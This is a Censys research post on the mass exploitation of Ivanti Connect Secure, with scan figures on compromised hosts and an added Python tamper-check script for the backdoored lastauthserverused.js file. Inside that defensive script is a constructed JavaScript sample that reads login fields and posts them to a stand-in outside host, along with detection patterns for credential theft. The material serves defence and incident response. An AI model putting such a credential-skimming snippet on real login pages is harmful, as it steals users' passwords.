
The Mass Exploitation of Ivanti Connect Secure

Compromised Ivanti Connect Secure IPs

Last Friday, CISA issued Emergency Directive 24-01 mandating all Federal Civilian Executive Branch (FCEB) agencies to address two actively exploited vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure. These vulnerabilities, CVE-2023-46805 (an authentication bypass vulnerability) and CVE-2024-21887 (a command-injection vulnerability), when exploited in combination, allow malicious actors to achieve remote code execution (RCE) on vulnerable servers. All supported versions, including Version 9.x and 22.x, are affected by these vulnerabilities (refer to Ivanti’s version support matrix).

FCEB agencies had until 11:59 EST on Monday, January 22, to implement Ivanti’s recovery steps, run the vendor’s Integrity Checker Tool, and take additional action if signs of compromise were detected.

This directive is no surprise given the worldwide mass exploitation observed since Ivanti first disclosed the vulnerabilities on January 10. The situation is particularly serious because of the severity of the flaws, the broad Internet exposure of these systems, and the difficulty of mitigation, especially since no official patch was available from the vendor as of this writing. Ivanti has outlined a plan to release patches on a staggered schedule beginning this week.

Volexity researchers first identified exploitation attempts dating back to December 2023. Subsequent analysis revealed that the initial activity was likely the work of an unidentified threat actor tracked by Volexity as “UTA0178.” A Proof of Concept was published on January 16.

Censys researchers conducted scans to dig deeper into the extent of compromised servers.

Censys Findings

As of Monday, January 22, 2024, Censys observed the following: 

Description                                                     Value
--------------------------------------------------------------  ------
Number of Unique Connect Secure Hosts                           26,095
Number of Unique Compromised Connect Secure Hosts               412
Percentage of Hosts Compromised                                 1.5%
Number of Unique Credential Stealing Receivers / Callback URLs  22

In their research, Volexity noted that a legitimate JavaScript component (/dana-na/auth/lastauthserverused.js), used to remember the last selected authentication realm, had been modified by attackers to include various mechanisms for hijacking and exfiltrating client login information. This backdoored JavaScript sends the username, password, and URL of the attempted authentication back to an attacker-owned HTTP server.

We conducted a secondary scan on all Ivanti Connect Secure servers in our dataset and found 412 unique hosts with this backdoor. Additionally, we found 22 distinct “variants” (or unique callback methods), which could indicate multiple attackers or a single attacker evolving their tactics.
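The following is an added example, not Censys or Ivanti code, showing the kind of offline check a defender could run on a copy of lastauthserverused.js pulled from an appliance: compare its SHA-256 against a known-good baseline and flag any absolute URL pointing off the appliance, or any access to credential fields combined with a network call. Both JavaScript samples below are constructed stand-ins (the clean one is a toy realm-remembering helper, the tampered one a toy version of the exfiltration logic described above); the known-good digest is derived from that constructed clean sample and the appliance hostname is hypothetical. Ivanti's Integrity Checker Tool remains the authoritative check; this only illustrates what the tampering looks like from the defender's side.

```python
"""Heuristic tamper check for a fetched copy of /dana-na/auth/lastauthserverused.js.

Added example; not Censys or Ivanti code. All inputs below are constructed.
"""
import hashlib
import re
from urllib.parse import urlparse

# Constructed stand-in for the legitimate helper (remembers the last realm).
CLEAN_JS = """
function setLastAuthServerUsed(realm) {
  document.cookie = "lastAuthServerUsed=" + realm + "; path=/";
}
"""

# Constructed stand-in for a backdoored copy: same helper plus injected
# logic that reads the login fields and posts them to an outside host.
TAMPERED_JS = CLEAN_JS + """
(function () {
  var u = document.getElementById("username").value;
  var p = document.getElementById("password").value;
  var x = new XMLHttpRequest();
  x.open("POST", "https://collector.example.invalid/log", true);
  x.send(JSON.stringify({u: u, p: p, url: location.href}));
})();
"""

# Hypothetical baseline: in practice, take the digest from a clean appliance
# running the same version. Here it is simply the digest of CLEAN_JS.
KNOWN_GOOD_SHA256 = hashlib.sha256(CLEAN_JS.encode()).hexdigest()

# Absolute http(s) URLs embedded in the script.
EXTERNAL_URL = re.compile(r'https?://[^\s"\'`)]+', re.IGNORECASE)
# References to login form fields.
CREDENTIAL_REFS = re.compile(r"\b(password|passwd|username)\b", re.IGNORECASE)
# Browser primitives that can carry data off the page.
NETWORK_CALLS = re.compile(r"\b(XMLHttpRequest|fetch|sendBeacon|new Image)\b")


def scan_lastauth_js(js_text, known_good_sha256, appliance_host):
    """Return the digest of js_text plus a list of human-readable findings.

    An empty findings list means the copy matches the baseline and shows none
    of the tampering patterns; anything else warrants the vendor's full
    integrity check and incident-response steps.
    """
    findings = []
    digest = hashlib.sha256(js_text.encode()).hexdigest()
    if digest != known_good_sha256:
        findings.append("sha256 differs from known-good baseline")

    for url in EXTERNAL_URL.findall(js_text):
        host = urlparse(url).hostname
        if host and host.lower() != appliance_host.lower():
            findings.append(f"external URL referenced: {url}")

    if CREDENTIAL_REFS.search(js_text) and NETWORK_CALLS.search(js_text):
        findings.append("credential field access combined with a network call")

    return {"sha256": digest, "findings": findings}


def check_hosts(samples, known_good_sha256):
    """Scan a mapping of appliance hostname -> fetched script text.

    Returns a mapping of hostname -> findings list (empty means clean).
    """
    return {
        host: scan_lastauth_js(js, known_good_sha256, host)["findings"]
        for host, js in samples.items()
    }


if __name__ == "__main__":
    # Constructed fleet: one clean appliance, one tampered one.
    fleet = {
        "vpn-a.example.invalid": CLEAN_JS,
        "vpn-b.example.invalid": TAMPERED_JS,
    }
    for host, findings in check_hosts(fleet, KNOWN_GOOD_SHA256).items():
        status = "CLEAN" if not findings else "SUSPECT"
        print(f"{host}: {status}")
        for f in findings:
            print(f"  - {f}")
```

The hash comparison is the strong signal and the regexes are only there to explain why a mismatch matters; a tampered copy that used a different field name or a relative URL would still fail the digest check, which is why the baseline should come from a clean appliance of the same version rather than from a pattern list.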

Censys Search customers can use the following query to identify Ivanti Connect Secure hosts.